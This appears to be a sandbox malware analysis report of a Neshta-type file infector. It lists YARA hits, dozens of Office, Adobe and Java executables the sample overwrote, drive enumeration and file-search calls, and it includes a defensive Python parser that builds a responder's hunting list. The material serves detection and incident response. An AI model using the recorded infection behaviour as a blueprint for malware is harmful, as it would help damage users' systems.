                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe, type: DROPPED
                          Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Windows\svchost.com, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, type: DROPPED
                          Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ChromeSetup.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPED
                          Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe, type: DROPPED
Infects executable files (exe, dll, sys, html)
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Users\user\AppData\Local\Temp\CR_94EB1.tmp\setup.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\AutoIt3\Uninstall.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaws.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; System file written: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE
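The two lists above (Yara hits on dropped files, and the "System file written" records under the file-infection signature) are what a responder turns into a hunting list: every path is an executable the sample overwrote, so on any other host that ran this sample those files can no longer be trusted on the strength of their vendor directory. The script below is an added example for this page, not Joe Sandbox code. It parses the flattened report text exactly as it appears here (run-together field labels, trailing "Jump to behavior" link text), de-duplicates paths that appear in both lists, counts modified executables per directory, and separates paths under C:\Windows and the user's Temp directory (where this report shows svchost.com and the 3582-490 copy of the sample landing) from the infected application binaries. SAMPLE_LINES is a constructed excerpt assembled from records on this page.

```python
"""Turn flattened Joe Sandbox evidence lines for a Neshta sample into a hunting list.

Added example, not part of the original report. Input is the page text as extracted:
'Source: Yara matchFile source: <path>, type: DROPPED' and
'Source: <process>System file written: <path>Jump to behavior'.
"""
import re
from collections import Counter

# Constructed excerpt: lines copied in the shape they take on this page.
SAMPLE_LINES = r"""
Source: Yara matchFile source: C:\Windows\svchost.com, type: DROPPED
Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe, type: DROPPED
Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe, type: DROPPED
Infects executable files (exe, dll, sys, html)Show sources
Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJump to behavior
Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEJump to behavior
Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exeJump to behavior
Source: C:\Users\user\Desktop\$RUX313H.exeSystem file written: C:\Users\user\AppData\Local\Temp\CR_94EB1.tmp\setup.exeJump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
"""

# Interactive-page link text that the extraction glued onto each record.
RESIDUE = ("Jump to behavior", "Show sources")

# The process path runs straight into the field label, so match non-greedily up to it.
WRITTEN_RE = re.compile(r"^Source:\s*(?P<proc>\S.*?)System file written:\s*(?P<path>.+?)\s*$")
YARA_RE = re.compile(r"^Source:\s*Yara match\s*File source:\s*(?P<path>.+?),\s*type:\s*(?P<kind>\w+)\s*$")


def strip_residue(line: str) -> str:
    """Drop leading indentation and trailing link text from one report line."""
    line = line.strip()
    for tag in RESIDUE:
        if line.endswith(tag):
            line = line[: -len(tag)].rstrip()
    return line


def parse_report(text: str) -> dict:
    """Return {'written': [(process, path)], 'yara': [(path, kind)]}; other lines are ignored."""
    written, yara = [], []
    for raw in text.splitlines():
        line = strip_residue(raw)
        m = WRITTEN_RE.match(line)
        if m:
            written.append((m["proc"].strip(), m["path"].strip()))
            continue
        m = YARA_RE.match(line)
        if m:
            yara.append((m["path"].strip(), m["kind"]))
    return {"written": written, "yara": yara}


def hunting_list(parsed: dict) -> list:
    """Unique file paths touched by the sample, from both evidence lists, sorted case-insensitively."""
    paths = {p for _, p in parsed["written"]} | {p for p, _ in parsed["yara"]}
    return sorted(paths, key=str.lower)


def infected_by_directory(parsed: dict) -> Counter:
    """How many executables were overwritten per parent directory."""
    counts = Counter()
    for _, path in parsed["written"]:
        counts[path.rsplit("\\", 1)[0]] += 1
    return counts


def outside_app_dirs(paths) -> list:
    """Paths under C:\\Windows or a per-user Temp directory: in this report that is where the
    sample's own copies land (svchost.com, Temp\\3582-490), as opposed to infected app binaries."""
    hits = []
    for p in paths:
        low = p.lower()
        if low.startswith("c:\\windows\\") or "\\appdata\\local\\temp\\" in low:
            hits.append(p)
    return hits


if __name__ == "__main__":
    parsed = parse_report(SAMPLE_LINES)
    for directory, n in infected_by_directory(parsed).most_common():
        print(f"{n:3d}  {directory}")
    print("dropper locations:", outside_app_dirs(hunting_list(parsed)))
```

Feed it the whole report text instead of the excerpt to get the full list; the per-directory counts show at a glance which installed products need their binaries replaced from known-good media, since Neshta modifies the host executable rather than dropping a file beside it.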
Source: C:\Windows\System32\msiexec.exe; File opened: z:
Source: C:\Windows\System32\msiexec.exe; File opened: x:
Source: C:\Windows\System32\msiexec.exe; File opened: v:
Source: C:\Windows\System32\msiexec.exe; File opened: t:
Source: C:\Windows\System32\msiexec.exe; File opened: r:
Source: C:\Windows\System32\msiexec.exe; File opened: p:
Source: C:\Windows\System32\msiexec.exe; File opened: n:
Source: C:\Windows\System32\msiexec.exe; File opened: l:
Source: C:\Windows\System32\msiexec.exe; File opened: j:
Source: C:\Windows\System32\msiexec.exe; File opened: h:
Source: C:\Windows\System32\msiexec.exe; File opened: f:
Source: C:\Windows\System32\msiexec.exe; File opened: b:
Source: C:\Windows\System32\msiexec.exe; File opened: y:
Source: C:\Windows\System32\msiexec.exe; File opened: w:
Source: C:\Windows\System32\msiexec.exe; File opened: u:
Source: C:\Windows\System32\msiexec.exe; File opened: s:
Source: C:\Windows\System32\msiexec.exe; File opened: q:
Source: C:\Windows\System32\msiexec.exe; File opened: o:
Source: C:\Windows\System32\msiexec.exe; File opened: m:
Source: C:\Windows\System32\msiexec.exe; File opened: k:
Source: C:\Windows\System32\msiexec.exe; File opened: i:
Source: C:\Windows\System32\msiexec.exe; File opened: g:
Source: C:\Windows\System32\msiexec.exe; File opened: e:
Source: C:\Windows\System32\msiexec.exe; File opened: c:
Source: C:\Windows\System32\msiexec.exe; File opened: a:
Source: C:\Users\user\Desktop\$RUX313H.exe; Code function: 0_2_00406D40 GetLogicalDriveStringsA,GetDriveTypeA
Source: C:\Users\user\Desktop\$RUX313H.exe; File opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; File opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; File opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\APPLIC~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; File opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; File opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; File opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exe
Source: C:\Users\user\Desktop\$RUX313H.exe; Code function: 0_2_00405080 FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\$RUX313H.exe; Code function: 0_2_00405634 FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\$RUX313H.exe; Code function: 0_2_00404F6C FindFirstFileA,FindClose
Source: C:\Users\user\Desktop\$RUX313H.exe; Code function: 0_2_0040F0C4 FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\$RUX313H.exe; Code function: 0_2_0040F0CC FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\$RUX313H.exe; Code function: 0_2_0040F13F FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\$RUX313H.exe; Code function: 0_2_004056A7 FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\$RUX313H.exe; Code function: 0_2_0040EA04 FindFirstFileA,FindClose
Source: C:\Users\user\Desktop\$RUX313H.exe; Code function: 0_2_0040EB16 FindFirstFileA,FindClose
Source: C:\Users\user\Desktop\$RUX313H.exe; Code function: 0_2_0040EB18 FindFirstFileA,FindNextFileA,FindClose
Source: C:\Windows\svchost.com; Code function: 2_2_00405634 FindFirstFileA,FindNextFileA,FindClose
Source: C:\Windows\svchost.com; Code function: 2_2_00404F6C FindFirstFileA,FindClose
Source: C:\Windows\svchost.com; Code function: 2_2_0040F0C4 FindFirstFileA,FindNextFileA,FindClose
Source: C:\Windows\svchost.com; Code function: 2_2_0040F0CC FindFirstFileA,FindNextFileA,FindClose
Source: C:\Windows\svchost.com; Code function: 2_2_00405080 FindFirstFileA,FindNextFileA,FindClose
Source: C:\Windows\svchost.com; Code function: 2_2_0040F13F FindFirstFileA,FindNextFileA,FindClose
Source: C:\Windows\svchost.com; Code function: 2_2_004056A7 FindFirstFileA,FindNextFileA,FindClose
Source: C:\Windows\svchost.com; Code function: 2_2_0040EA04 FindFirstFileA,FindClose
Source: C:\Windows\svchost.com; Code function: 2_2_0040EB16 FindFirstFileA,FindClose
Source: C:\Windows\svchost.com; Code function: 2_2_0040EB18 FindFirstFileA,FindNextFileA,FindClose
Source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000000.664187836.0000000001162000.00000002.00020000.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000000.664187836.0000000001162000.00000002.00020000.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000000.664187836.0000000001162000.00000002.00020000.sdmp; String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingg2.crl0T
Source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000000.664187836.0000000001162000.00000002.00020000.sdmp; String found in binary or memory: http://crl.globalsign.net/root.crl0
Source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000000.664187836.0000000001162000.00000002.00020000.sdmp; String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
